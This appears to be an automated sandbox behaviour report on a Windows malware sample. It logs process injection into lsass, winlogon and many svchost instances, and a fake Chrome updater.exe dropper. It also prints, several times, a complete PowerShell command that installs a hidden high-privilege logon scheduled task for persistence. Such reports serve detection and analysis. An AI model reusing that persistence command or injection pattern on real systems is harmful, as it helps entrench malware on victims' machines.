Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3F0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: EF5FC0B010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 2549FAF010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 6F4E4CF010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A661330000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87F40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 179537D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D590000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25306E90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B940000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D5590A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9ED0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD731C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E8C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870090000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184290000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166980000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 1380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F4197C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F8F1A00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 228BE340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20823A10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 144B2660000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1988E640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F724890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }	Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

4_2_00007FF78AB31C64

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

4_2_00007FF78AB31C64

Source: dwm.exe, 0000000A.00000000.1758015033.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000A.00000002.3032503633.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\winlogon.exe

Code function: 7_2_00000225DC6214A0 cpuid

7_2_00000225DC6214A0

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
